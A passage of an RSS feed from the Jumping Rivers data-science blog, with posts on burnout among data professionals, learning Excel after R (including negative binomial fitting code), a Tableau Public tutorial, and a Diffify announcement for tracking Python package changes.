&lt;/p&gt;</description></item><item><title>Burnout in Data Professionals - A Personal Take</title><link>https://www.jumpingrivers.com/blog/burnout-in-data-professionals/</link><pubDate>Thu, 01 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/burnout-in-data-professionals/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/burnout-in-data-professionals/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/burnout-in-data-professionals/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Data science and data engineering are incredibly cognitively demanding professions. As data professionals, we are required to leverage both our analytical/engineering skills and our interpersonal skills to be effective contributors within our organisations. Based on my personal experience, the field seems to concentrate humans who are detail-oriented, curious, impact-driven and tenacious to a fault. This Type A personality profile, while magical when applied to technical work, could reasonably also count as an occupational hazard.&lt;/p&gt;
&lt;p&gt;We also have a &lt;a href="https://www2.deloitte.com/us/en/insights/industry/technology/data-analytics-skills-shortage.html" rel="external"&gt;skills shortage&lt;/a&gt; in our field, so many data professionals are taking on more than what is reasonable for one human to endure. It is therefore no surprise that the &lt;a href="https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century" rel="external"&gt;sexiest profession of the 21st century&lt;/a&gt; is also one of the professions with the &lt;a href="https://www.datanami.com/2021/11/02/battle-for-data-pros-heats-up-as-burnout-builds/" rel="external"&gt;highest rates of burnout&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The thing is - this field is great to work in. Extracting a clear narrative from data is one of the most satisfying things ever (I might be biased). The minds that give us these valuable insights are the same minds that need careful tending. Anti-burnout strategies are not only about ensuring productivity in the workplace - they are fundamental to the improved quality of life we should be striving for as a society.&lt;/p&gt;
&lt;p&gt;I think of those in our field as not unlike high-performance athletes. Boxers wear boxing gloves. Hockey players wear shin guards. Ballet dancers warm up for hours before performances. How are we proactively protecting the minds of our data professionals?&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-burnout-in-data-professionals"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="could-you-be-burnt-out"&gt;Could you be burnt out?&lt;/h3&gt;
&lt;p&gt;Before we go on to discuss strategies for dealing with burnout, it’s important to consider whether you are experiencing some of the symptoms.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://www.nhs.uk/every-mind-matters/mental-health-issues/stress/" rel="external"&gt;NHS&lt;/a&gt; describes those who are burnt out as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;feeling overwhelmed&lt;/li&gt;
&lt;li&gt;experiencing racing thoughts or difficulty concentrating&lt;/li&gt;
&lt;li&gt;irritable&lt;/li&gt;
&lt;li&gt;feeling constantly worried, anxious or scared&lt;/li&gt;
&lt;li&gt;feeling a lack of self-confidence&lt;/li&gt;
&lt;li&gt;having trouble sleeping or feeling tired all the time&lt;/li&gt;
&lt;li&gt;avoiding things or people you are having problems with&lt;/li&gt;
&lt;li&gt;eating more or less than usual&lt;/li&gt;
&lt;li&gt;drinking or smoking more than usual&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;On a personal note, I have experienced many of these symptoms during my PhD and beyond. I had this overwhelming feeling that my to-do list was simultaneously too long and also not really worth doing at all. I felt disconnected from myself and everyone in my life. Therapy was the only thing that enabled me to get a handle on my life and career path. If you are experiencing most of these symptoms on a daily basis, I highly recommend starting a journey with a trained therapist. Dealing with burnout wasn’t a pleasant experience. I’m grateful that I had the support of my therapist, family and friends. If you are experiencing this, know that you deserve the care and attention. I encourage you to make the calls you need to make.&lt;/p&gt;
&lt;h3 id="here-are-some-strategies-i-employ-to-prevent-burnout"&gt;Here are some strategies I employ to prevent burnout:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;I remind myself that I deserve care, especially from myself. This is the toughest nut to crack, but it is half the battle won. A good tip my coach gave me was to write two positive affirmations for myself for every self-deprecating comment I made about myself. This was really weird at first, but eventually I started writing affirmations to myself like “I deserve rest” and “I am capable”. Pretty soon into this journey, I started to believe them.&lt;/li&gt;
&lt;li&gt;I tune into my body. When I notice that my sleep is disrupted, or I’m more snacky and snoozy than usual, a little red flag is raised in my mind. When my nervous system is feeling overwhelmed, I become aware that I need some self-care intervention. Something that really helps me is time in nature, a phone call with an old friend, a hot bath or an episode of RuPaul’s Drag Race.&lt;/li&gt;
&lt;li&gt;I practise saying no. As a curious and tenacious human, I want to say yes to all of the cool projects and challenges that come my way, even if I have objectively no business taking them on. Just because you can do something doesn’t mean you necessarily should be the person to do it. If you struggle to say “no” to your boss directly, try saying something like “let me have a look at what I can shuffle around on my plate to make space for this task”. This way you have time to strategise fitting the work into your schedule, while reminding your manager that your plate is already at capacity.&lt;/li&gt;
&lt;li&gt;I try my best to communicate my needs to the people who are affected by my actions. Managing expectations reduces my stress and the stress of those around me.&lt;/li&gt;
&lt;li&gt;I make time for things that bring me pure unadulterated joy. Reconnect with parts of yourself that you left in childhood, like reading an old favourite book or watching the Lion King. Refilling your cup is so important. It isn’t enough to rest, it’s also important to recharge.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In recovering from burnout, it was very important to me to be intentional about the next workplace I would invest my time and energy in. Eight months in, I am really enjoying the level of care that I am seeing within Jumping Rivers. There is a very strong culture of colleagues trying to make sure that their peers don’t overwork themselves. People here are very eager to help one another out where they can. We have a generous amount of leave and flexible working hours. It&amp;rsquo;s not uncommon to look at calendars and see &amp;ldquo;MOT&amp;rdquo;, &amp;ldquo;School run&amp;rdquo;, &amp;ldquo;Going for a paddle&amp;rdquo;. With this visibility, we remind one another that we work to live and don’t live to work. There is also trust from upper management that we are all trying our very best, and don’t need micromanaging. The value of this trust cannot be overstated.&lt;/p&gt;
&lt;p&gt;I’ll finish by saying that no person is perfect. This human-level imperfection scales to organisation-level imperfection. No group of humans is going to perfectly navigate the challenges presented by modern life. What’s important to me is to try my best to bring patience, sensitivity and empathy to all areas, including the workplace. To my colleagues and employers, of course, but most importantly to myself.&lt;/p&gt;
&lt;p&gt;If you are practising self-care for a few weeks and are still feeling overwhelmed, it might be time to go and see a mental health care professional. Unfortunately one cannot eat-pray-love oneself out of all issues.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/burnout-in-data-professionals/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Learning Excel as an R user</title><link>https://www.jumpingrivers.com/blog/learning-excel-after-r/</link><pubDate>Thu, 24 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/learning-excel-after-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/learning-excel-after-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/learning-excel-after-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Recently I came across a situation where I had to use Microsoft Excel for a project. As somebody who has always used R for any statistical analysis, I may not have been entirely enthusiastic about the idea of leaving R behind for the world of Excel. But I figured it would be a good time to dip my toes in. In this blog post I discuss some of the things I found surprisingly difficult when learning Excel as an R user.&lt;/p&gt;
&lt;h2 id="getting-used-to-the-lack-of-resources"&gt;Getting used to the lack of resources&lt;/h2&gt;
&lt;p&gt;One thing I particularly struggled with when using Excel was the difference in availability of free-to-use resources. In R there are thousands of open source packages available that either already do what you want or can assist you in getting to your goal. However, since Excel is not open source I found that, whilst resources sometimes already existed to do what I wanted to do, those resources were often pay-to-use. I ended up spending more time developing my own method for something that had already been done by somebody else. I&amp;rsquo;ve been spoiled by the open source nature of R and the availability of community-built packages that do a lot of my work for me.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-learning-excel-after-r"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="working-with-less-common-probability-distributions"&gt;Working with less common probability distributions&lt;/h2&gt;
&lt;p&gt;Before starting to work with Excel I think I was slightly over-optimistic about its capabilities for statistical analysis. I had hoped that there would be built-in functions for working with most statistical distributions. Whilst there are built-in functions for some distributions, the availability of these functions is not very consistent. For example, for the Normal distribution there are built-in Excel functions for the PDF, CDF and inverse CDF. However, for the Negative Binomial distribution Excel only provides functions for the PDF and CDF of the distribution, and not for the inverse CDF. I found this inconsistency annoying, as functions that I expected to exist didn&amp;rsquo;t.&lt;/p&gt;
&lt;p&gt;It is worth saying that there is a free to download &lt;a href="https://www.real-statistics.com/free-download/real-statistics-resource-pack/" rel="external"&gt;resource pack&lt;/a&gt; available that does include functions for the inverse CDF of a Negative Binomial distribution, among other useful resources. It was the inconsistent availability of these functions (without the extra resources) that was a little annoying to me. It&amp;rsquo;s worth noting that base R also only includes functions for some of the most common probability distributions. However, at least R is consistent in which functions are available for the distributions.&lt;/p&gt;
&lt;h2 id="increase-in-work-required"&gt;Increase in work required&lt;/h2&gt;
&lt;p&gt;As a consequence of the lack of available free resources, I found that I spent a lot of time and effort developing solutions to problems in Excel. That&amp;rsquo;s especially annoying when I know that it would only take one line of code in R.&lt;/p&gt;
&lt;p&gt;As an example, when fitting a distribution in R, we can use the &lt;code&gt;fitdistr()&lt;/code&gt; function from the {MASS} package. Let’s say we have some data that we think may follow a Negative Binomial distribution and we wish to estimate the parameters of the distribution from the data. If &lt;code&gt;x&lt;/code&gt; is a vector of our data then we can estimate the parameters of the Negative Binomial distribution as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(MASS)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fitdistr&lt;/span&gt;(x, &lt;span style="color:#a5d6ff"&gt;&amp;#34;negative binomial&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In contrast, in Excel this required an entire spreadsheet of work. The spreadsheet involved implementing maximum likelihood estimation of the distribution’s parameters by building formulae to numerically solve the following equation for &lt;em&gt;r&lt;/em&gt;:&lt;/p&gt;
&lt;div style="overflow-x: auto; position: relative"&gt;
$$\left [ \sum_{i=1}^N \psi(x_i + r) \right ] - N\psi(r) + N \ln \left (\frac{r}{r + \sum_{i=1}^N x_i/N} \right ) = 0$$
&lt;/div&gt;
&lt;p&gt;and then using this to solve the following equation for &lt;em&gt;p&lt;/em&gt;:&lt;/p&gt;
&lt;div style="overflow-x: auto; position: relative"&gt;
$$p = \frac{Nr}{Nr + \sum_{i=1}^N x_i} $$
&lt;/div&gt;
&lt;p&gt;where &lt;em&gt;x&lt;/em&gt;&lt;sub&gt;1&lt;/sub&gt;, …, &lt;em&gt;x&lt;/em&gt;&lt;sub&gt;&lt;em&gt;N&lt;/em&gt;&lt;/sub&gt; are the data points and
&lt;em&gt;ψ&lt;/em&gt;() is the digamma function.&lt;/p&gt;
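&lt;p&gt;To make the two equations above concrete, here is a minimal sketch in Python (standard library only) that solves the first equation for &lt;em&gt;r&lt;/em&gt; by bisection and then plugs the result into the second. It is not what &lt;code&gt;fitdistr()&lt;/code&gt; or the spreadsheet does internally: the function names, the search interval, the series approximation to the digamma function and the example counts are all assumptions made for illustration.&lt;/p&gt;

```python
import math


def digamma(x):
    """Approximate the digamma function for x > 0."""
    # Shift x upwards with psi(x) = psi(x + 1) - 1/x until the
    # asymptotic series below is accurate.
    total = 0.0
    for _ in range(max(0, math.ceil(6.0 - x))):
        total -= 1.0 / x
        x += 1.0
    inv2 = 1.0 / (x * x)
    series = inv2 * (1.0 / 12 - inv2 * (1.0 / 120 - inv2 / 252))
    return total + math.log(x) - 0.5 / x - series


def score(r, data):
    """Left-hand side of the equation for r."""
    n = len(data)
    mean = sum(data) / n
    return (sum(digamma(x + r) for x in data)
            - n * digamma(r)
            + n * math.log(r / (r + mean)))


def fit_negative_binomial(data, lo=1e-3, hi=1e3, iterations=200):
    """Return (r, p) solving the two likelihood equations."""
    # Bisection needs a sign change; there may be none if the data
    # are not overdispersed (variance no larger than the mean).
    if not (score(lo, data) > 0 > score(hi, data)):
        raise ValueError("no root for r in the search interval")
    for _ in range(iterations):
        mid = 0.5 * (lo + hi)
        if score(mid, data) > 0:
            lo = mid
        else:
            hi = mid
    r = 0.5 * (lo + hi)
    n = len(data)
    p = n * r / (n * r + sum(data))
    return r, p


# Made-up counts, purely for illustration
counts = [0, 1, 1, 2, 3, 3, 4, 5, 7, 10, 0, 2, 6, 1, 12]
r_hat, p_hat = fit_negative_binomial(counts)
print(r_hat, p_hat)
```

&lt;p&gt;Even this stripped-down version needs a root finder and a hand-rolled digamma function, which gives a feel for how much a single call to a fitting function is doing on your behalf.&lt;/p&gt;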
&lt;p&gt;As I’m sure most people would agree, I’d rather not have to manually set up a spreadsheet to solve this equation (playing with digamma functions is not always fun), especially when I know there&amp;rsquo;s a function in R that already does all of this for me behind the scenes.&lt;/p&gt;
&lt;p&gt;Nevertheless, for the hundred data points contained in column A, the image below shows a screenshot of how this would work in Excel. On top of the formulae included, this also involved using the Excel Solver add-on to do the numerical estimation of &lt;em&gt;r&lt;/em&gt;. Personally, I find this much more complicated than the single line in R!&lt;/p&gt;
&lt;img class="image-center" src="Excel_example.png" alt="Screenshot of an Excel spreadsheet which has a number of complicated formulae set up." style="width: 700px; display: block; margin-left: auto; margin-right: auto; class:image-cente"/&gt;
&lt;p&gt;Many people use Excel every day without any problems, so plenty of them must find working with it far easier than I did. I think I come from a relatively unusual place in having learnt to use R before I had a go at Excel, and I was really surprised by how hard some things were to do that were really quick in R. This is probably down to having many years of practice with R, and very little practice with Excel. It&amp;rsquo;s true that for those without programming experience it may take a bit of time to figure out how to get started with R. But once you have picked up &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;the basics&lt;/a&gt; it can be really quick to solve a lot of problems, and in my opinion, much easier!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/learning-excel-after-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Getting started with Tableau</title><link>https://www.jumpingrivers.com/blog/getting-started-tableau/</link><pubDate>Thu, 17 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/getting-started-tableau/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/getting-started-tableau/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/getting-started-tableau/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="what-is-tableau"&gt;What is Tableau?&lt;/h3&gt;
&lt;p&gt;Tableau is a software company specialising in interactive data visualisations, and Tableau Public is a free platform they offer for sharing insights into data via visualisations. It is intended solely for public data, meaning insights are for anybody to see. They also offer Tableau Server, which is specifically for commercial use with private data.&lt;/p&gt;
&lt;h3 id="why-use-tableau"&gt;Why use Tableau?&lt;/h3&gt;
&lt;p&gt;Tableau is a great option that sits between Excel-like software and using a programming language such as R or Python. Tableau Public is highly intuitive for new users; it&amp;rsquo;s easy to get started and makes analysing data more accessible. For instance, you can manipulate data and join datasets with ease, with no coding involved. There&amp;rsquo;s a big community aspect to Tableau, with many interesting visualisations featured on the home page to inspire, spread knowledge and give recognition.&lt;/p&gt;
&lt;h3 id="what-can-you-create-with-tableau"&gt;What can you create with Tableau?&lt;/h3&gt;
&lt;p&gt;Before we get into how to use this software we&amp;rsquo;d like to showcase two items we found on the homepage which show what is achievable with Tableau Public. First is an aesthetic &lt;a href="https://public.tableau.com/app/profile/elaine.siu/viz/QualityofLife_16599995199570/TheBIGGERtheBETTER" rel="external"&gt;report&lt;/a&gt; based on some 2022 data by Elaine Siu exploring the quality of life within cities. The next one is an interesting &lt;a href="https://public.tableau.com/app/profile/david.potter3468/viz/IfItAintBrokeDontFixIt-MovieRemakes/MovieComparison" rel="external"&gt;visualisation&lt;/a&gt; by David Potter in which he analyses the rating of remade films versus the originals.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-getting-started-with-tableau"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="first-steps"&gt;First steps&lt;/h3&gt;
&lt;p&gt;The first step is heading to the &lt;a href="https://public.tableau.com/app/discover" rel="external"&gt;Tableau Public website&lt;/a&gt; and signing up for an account, which simply requires an email address and password. It is also possible to use Tableau Public on desktop, but today we are covering how to use it on the website. Once logged in, you will be taken to the home page where you will see the &amp;ldquo;Viz of the day&amp;rdquo; and other featured visualisations.&lt;/p&gt;
&lt;h3 id="creating-a-workbook"&gt;Creating a workbook&lt;/h3&gt;
&lt;p&gt;From the home page, hover over the create button at the top left of the screen and then click web authoring. This will create a workbook for you, from which you can upload data and start creating visualisations. To save your work at any point, click &amp;ldquo;Publish&amp;rdquo; in the top right corner. The work will become publicly available on your profile; if you don&amp;rsquo;t want it to appear there, you can change this in the settings.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of creating worksheet" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/webauth.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="uploading-your-data"&gt;Uploading your data&lt;/h3&gt;
&lt;p&gt;Uploading data is easy - either drag and drop a file or hit upload from your computer. Tableau accepts many different formats including CSV, MS Excel and Google Sheets. For this example I am using a small data set containing the top Premier League goal scorers from &lt;a href="https://en.wikipedia.org/wiki/List_of_footballers_with_100_or_more_Premier_League_goals" rel="external"&gt;Wikipedia&lt;/a&gt;. Tableau will then sort the variables in your data into discrete and continuous data types (you can change this later as you please).&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of uploading data" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/data.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="first-visualisation"&gt;First visualisation&lt;/h3&gt;
&lt;p&gt;Once the data is uploaded, click &amp;ldquo;Sheet 1&amp;rdquo; in the bottom left hand corner to go to the first sheet in your workbook. From here you will see all the variables from your data in the data pane to the left of your screen. Just drag and drop the variables you want to visualise into the columns and rows boxes at the top. We are going to plot goals by appearances from our data, then colour the points by player name by dragging the Player variable to the colour box.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of creating first visualisation" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/plot.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="new-worksheet"&gt;New worksheet&lt;/h3&gt;
&lt;p&gt;Once happy with your plot (don&amp;rsquo;t worry, you&amp;rsquo;ll still be able to update it), you may want to change its name from &amp;ldquo;Sheet 1&amp;rdquo; to something more descriptive, as it will make things easier going forward. Double click the tab that reads &amp;ldquo;Sheet 1&amp;rdquo; and type a new name. We&amp;rsquo;ll call ours &amp;ldquo;Goals by Apps&amp;rdquo;. Then to create a new worksheet just click the button next to your first sheet.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of creating worksheet" height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/newworksheet.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="creating-a-dashboard"&gt;Creating a dashboard&lt;/h3&gt;
&lt;p&gt;Finally, to create a dashboard you just have to click &amp;ldquo;New Dashboard&amp;rdquo;. This is found at the bottom next to the sheet names. Once you have the dashboard, drag and drop your sheets from the left hand pane into the configuration you want. In our example, we&amp;rsquo;ve created two more visualisations for the dashboard: a bar chart showing the goals to game ratio for the top ten goalscorers, and a scatter plot of players&amp;rsquo; goal to game ratio by their debut year. If you update any of the plots in the worksheet the dashboard will update accordingly.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A gif of creating dashboard" height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/getting-started-tableau/gifs/dash.gif" width="1845"&gt;&lt;/p&gt;
&lt;h3 id="our-dashboard"&gt;Our dashboard&lt;/h3&gt;
&lt;p&gt;One of the great things about Tableau dashboards is the fact that you can embed them on a web page very easily. If you want to share a dashboard you can either grab the link or grab the embed code and insert it into your website. Our embedded dashboard is below and as you can see it retains interactivity and will update if we change anything on Tableau!&lt;/p&gt;
&lt;div class='tableauPlaceholder' id='viz1667298187623' style='position: relative'&gt;&lt;noscript&gt;&lt;a href='#'&gt;&lt;img alt='Dashboard 1 ' src='https:&amp;#47;&amp;#47;public.tableau.com&amp;#47;static&amp;#47;images&amp;#47;Fo&amp;#47;Footy_test&amp;#47;Dashboard1&amp;#47;1_rss.png' style='border: none' /&gt;&lt;/a&gt;&lt;/noscript&gt;&lt;object class='tableauViz' style='display:none;'&gt;&lt;param name='host_url' value='https%3A%2F%2Fpublic.tableau.com%2F' /&gt; &lt;param name='embed_code_version' value='3' /&gt; &lt;param name='site_root' value='' /&gt;&lt;param name='name' value='Footy_test&amp;#47;Dashboard1' /&gt;&lt;param name='tabs' value='no' /&gt;&lt;param name='toolbar' value='yes' /&gt;&lt;param name='static_image' value='https:&amp;#47;&amp;#47;public.tableau.com&amp;#47;static&amp;#47;images&amp;#47;Fo&amp;#47;Footy_test&amp;#47;Dashboard1&amp;#47;1.png' /&gt; &lt;param name='animate_transition' value='yes' /&gt;&lt;param name='display_static_image' value='yes' /&gt;&lt;param name='display_spinner' value='yes' /&gt;&lt;param name='display_overlay' value='yes' /&gt;&lt;param name='display_count' value='yes' /&gt;&lt;param name='language' value='en-GB' /&gt;&lt;/object&gt;&lt;/div&gt; &lt;script type='text/javascript'&gt; var divElement = document.getElementById('viz1667298187623'); var vizElement = divElement.getElementsByTagName('object')[0]; if ( divElement.offsetWidth &gt; 800 ) { vizElement.style.width='1000px';vizElement.style.height='827px';} else if ( divElement.offsetWidth &gt; 500 ) { vizElement.style.width='1000px';vizElement.style.height='827px';} else { vizElement.style.width='100%';vizElement.style.height='1027px';} var scriptElement = document.createElement('script'); scriptElement.src = 'https://public.tableau.com/javascripts/api/viz_v1.js'; vizElement.parentNode.insertBefore(scriptElement, vizElement); &lt;/script&gt;
&lt;h3 id="what-next"&gt;What next?&lt;/h3&gt;
&lt;p&gt;The next step is for you to get on Tableau and have a go yourself! Try uploading some data and seeing what kind of visualisation or dashboard you can make. If you don&amp;rsquo;t fancy having a go, you could visit &lt;a href="https://public.tableau.com/app/discover" rel="external"&gt;the website&lt;/a&gt; and have a look at some of the featured dashboards.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/getting-started-tableau/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify - Python release</title><link>https://www.jumpingrivers.com/blog/diffify-python-release-pypi/</link><pubDate>Tue, 15 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-python-release-pypi/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-python-release-pypi/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/diffify_logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;It has been 6 months since the launch of &lt;a href="https://diffify.com/" rel="external"&gt;Diffify&lt;/a&gt;, our
website for comparing package releases. We are delighted to announce that, in
addition to CRAN&amp;rsquo;s 20,000 R packages, you can now track 1600 popular Python
packages!&lt;/p&gt;
&lt;h3 id="whats-included"&gt;What&amp;rsquo;s included?&lt;/h3&gt;
&lt;p&gt;The current criteria for a Python package to be included in Diffify are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The package is listed in the top 2000 &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt; packages
according to download statistics.&lt;/li&gt;
&lt;li&gt;The package has had version releases since 1st May 2020.&lt;/li&gt;
&lt;li&gt;The package wheel is downloadable from &lt;a href="https://pypi.org/" rel="external"&gt;pypi.org&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If your favourite package is not currently accessible, don&amp;rsquo;t worry! We are
actively working to expand the list to as many PyPI packages as possible, as
we&amp;rsquo;ll explain below.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-diffify-python-release"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="new-content"&gt;New content&lt;/h3&gt;
&lt;p&gt;The first change you&amp;rsquo;ll notice is to our &lt;a href="https://diffify.com/" rel="external"&gt;homepage&lt;/a&gt;, where
we now have buttons for both R and Python.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the new Diffify homepage: In the sidebar there are links to home, R and Python. The main body has some introduction text, and now contains a link to “Get started with Python”." height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/homepage.png" width="1826"&gt;&lt;/p&gt;
&lt;p&gt;Clicking on the Python button will take you through to the package search bar.
For this walkthrough, we will compare versions 3.3.0 and 3.5.0 of the Matplotlib
package. Diffify provides a breakdown of the changes to the package
dependencies, functions and classes.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the version comparison page for the Python package Matplotlib: The later version is set to 3.5.0 and the earlier version is set to 3.3.0. Collapsable windows are displayed which contain changes to Dependencies, Functions and Classes." height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/overview.png" width="1825"&gt;&lt;/p&gt;
&lt;h4 id="dependencies"&gt;Dependencies&lt;/h4&gt;
&lt;p&gt;We consider three kinds of dependencies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;Python&lt;/strong&gt; version requirement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Required&lt;/strong&gt; Python packages - these must be installed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optional&lt;/strong&gt; Python packages - installing these will enable extra package
features.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="A screenshot of the Dependencies window: This includes tabs for the “Python”, “Required” and “Optional” dependencies. The Python requirement has changed from 3.6 to 3.7." height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/dependencies.png" width="1538"&gt;&lt;/p&gt;
&lt;p&gt;In our example, we see that the Python version requirement has changed from
&lt;code&gt;&amp;gt;=3.6&lt;/code&gt; to &lt;code&gt;&amp;gt;=3.7&lt;/code&gt;.&lt;/p&gt;
&lt;h4 id="functions"&gt;Functions&lt;/h4&gt;
&lt;p&gt;Here we provide a list of functions that have been added, removed or changed
between the two versions.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the Functions window: A list of package functions is displayed. Each entry displays the function name prefixed by the module path on the left, and a button for accessing the function “Details” on the right. Each function is colour-coded based on whether it has been added, removed or changed." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/functions.png" width="1542"&gt;&lt;/p&gt;
&lt;p&gt;Clicking on the &amp;ldquo;Details&amp;rdquo; dropdown will bring up the function arguments,
including the argument name and default value. If type annotations are included
in the package source code, Diffify will also display the argument type and the
function return type.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the expanded “Details” for the matplotlib.pyplot.grid function: A table is displayed showing the function arguments for each version, including the argument name, default value, and type. Changed arguments are highlighted. The return type of the function is displayed above this table." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/arguments.png" width="1416"&gt;&lt;/p&gt;
&lt;p&gt;For the &lt;code&gt;pyplot.grid()&lt;/code&gt; function, the name of the first positional argument has
changed from &lt;code&gt;b&lt;/code&gt; to &lt;code&gt;visible&lt;/code&gt;.&lt;/p&gt;
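&lt;p&gt;As a rough illustration of this kind of comparison, the sketch below uses Python&amp;rsquo;s standard &lt;code&gt;inspect&lt;/code&gt; module to compare the parameters of two stand-in functions. This is not Diffify&amp;rsquo;s implementation: &lt;code&gt;grid_old&lt;/code&gt;, &lt;code&gt;grid_new&lt;/code&gt; and &lt;code&gt;changed_parameters&lt;/code&gt; are hypothetical names, with signatures loosely modelled on the rename described above.&lt;/p&gt;

```python
import inspect


# Stand-ins for the two versions of a function (hypothetical definitions)
def grid_old(b=None, which="major", axis="both", **kwargs):
    pass


def grid_new(visible=None, which="major", axis="both", **kwargs):
    pass


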